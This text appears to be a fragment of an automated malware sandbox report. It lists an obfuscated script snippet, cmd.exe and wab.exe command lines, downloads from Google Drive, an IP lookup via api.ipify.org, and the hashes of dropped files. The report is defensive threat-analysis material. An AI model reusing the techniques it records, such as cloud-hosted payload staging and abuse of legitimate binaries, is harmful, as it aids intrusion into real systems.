nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
Files
memory/2640-4-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp
memory/2640-5-0x000000001B570000-0x000000001B852000-memory.dmp
memory/2640-7-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-6-0x0000000002800000-0x0000000002808000-memory.dmp
memory/2640-8-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-9-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-10-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-11-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11PMM5DR0IT9S7NTEZNV.temp
| MD5 | ca0cb62acb863e6a43bb5e7e904723d6 |
| SHA1 | c7a33fd935a74bf51c50d63f313c286943fcad7e |
| SHA256 | c9bf41ee6976cada8f38656686108183962a89341875323cb954e12c08ab15e5 |
| SHA512 | d90c8897e22bbada46e2e276a458c7683a2c886b9277cc21084e1e7eca6a7a483e5dd866a097d2f2908badc18807b98d8d57c2b43c1e019f2b8da55416f91648 |
C:\Users\Admin\AppData\Roaming\Vigesimation.Sor
| MD5 | 3d5345e787f5607ceeab0031c358f539 |
| SHA1 | 19dc82bb214aa4cedc883e99d3d29b196d83a330 |
| SHA256 | dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2 |
| SHA512 | 8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f |
memory/2640-31-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2200-32-0x00000000065D0000-0x000000000972C000-memory.dmp
memory/2640-33-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6aef994d68f80872bbf1cb884113b678 |
| SHA1 | de09b9436dc85dcb209eb0e984ef5f7b10f4a262 |
| SHA256 | 3f8012ec29eccbb3e4685be408337b2e5cf35ccc5c73cbbfe6c895c15f87ab7c |
| SHA512 | ed86a16edb52333378e8371b5e50344d245eff170049bf79dfad62482b23cd450f3e657ba8c7b749f5f04a12681cf5d1cd0df98553f079703528b89f0b1dc16a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | f23167d80233f717903aa79369a7f3a4 |
| SHA1 | 5cccfb014056de3c0a8810c706d637953ff17782 |
| SHA256 | 300042cba8afd16029d8afeb196d6940e2df4f2e5feb1ced58a63f8f9dfe4e28 |
| SHA512 | 777e54e3b1ae324c5e2b9544314a96bf2a13cfed6e78d9e5de4cffac5c87290613502967eb5f5f763c289a2ceb0169e898504c0513f52c701dbff79d1e57f346 |
memory/2716-60-0x0000000000B50000-0x0000000001BB2000-memory.dmp
memory/2640-61-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2716-62-0x0000000000B50000-0x0000000000B92000-memory.dmp